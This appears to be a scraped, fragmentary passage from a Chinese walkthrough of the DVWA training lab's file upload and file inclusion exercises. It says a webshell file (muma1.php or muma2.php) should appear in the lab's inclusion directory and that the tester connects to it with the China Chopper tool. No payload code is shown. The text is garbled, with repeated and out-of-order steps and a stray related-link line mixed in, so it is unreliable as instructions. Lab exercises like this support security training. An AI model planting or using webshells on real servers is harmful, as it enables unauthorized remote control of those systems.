(4).此时在文件包含目录下解析，如果执行了木马，应该在/var/www/DVWA-1.9/vulnerabilities/fi/目录下出现muma2.php文件

(5).用中国菜刀连接muma2.php，测试一句话木马文件是否创建与执行

DVWA-impossible等级

你可能感兴趣的:(DVWA靶机-文件上传漏洞(File Upload))

(5).此时在文件包含目录下解析，如果执行了木马，应该在`/var/www/DVWA-1.9/vulnerabilities/fi/`目录下出现muma1.php文件

(4).此时在文件包含目录下解析，如果执行了木马，应该在`/var/www/DVWA-1.9/vulnerabilities/fi/`目录下出现muma2.php文件